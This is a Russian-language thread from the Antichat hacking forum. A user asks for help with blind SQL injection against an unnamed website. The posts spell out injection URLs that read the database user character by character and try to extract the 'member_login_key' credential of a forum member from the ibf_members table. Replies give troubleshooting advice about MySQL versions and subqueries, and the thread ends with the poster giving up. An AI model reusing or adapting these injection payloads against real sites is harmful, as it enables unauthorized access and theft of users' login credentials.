Форум АНТИЧАТ - Blind SQL-Inj. Нужна помощь...

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Blind SQL-Inj. Нужна помощь... (https://forum.antichat.xyz/showthread.php?t=51196)

Blind SQL-Inj. Нужна помощь...

Есть скрипт, подверженный Blind SQL-инъекции:

Код:

index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring(user(),1,1)))>1/*

запрос успешно выполняется, все символы спокойно перебираются.

Если вместо user() поставить (select+member_login_key+from+ibf_members+where+id =2), чтоб было вот так:

Код:

index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring((select+member_login_key+from+ibf_members+where+id=2),1,1)))>1/*

то выдается ошибка:

Цитата:

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select member_login_key from ibf_members where id=2),1,1)))>1/*

Указанные поле и таблица точно существуют. Пробовал также варианты с aes_decrypt/aes_encrypt, char(), concat() - безрезультатно.

Кто-нить знает, почему выдается эта ошибка, и как это обойти? Запрос ведь верный вроде...

версия mysql ниже 4.1 не поддерживает подзапросов

Согласен с бр сначало надо пробить version()

Цитата:

Сообщение от blackybr

версия mysql ниже 4.1 не поддерживает подзапросов

Спасибо, не знал.

Версия 4.0.27-log :(
По всей видимости придётся забить на эту дырку. :(
Всем спасибо.

Закрыто значит.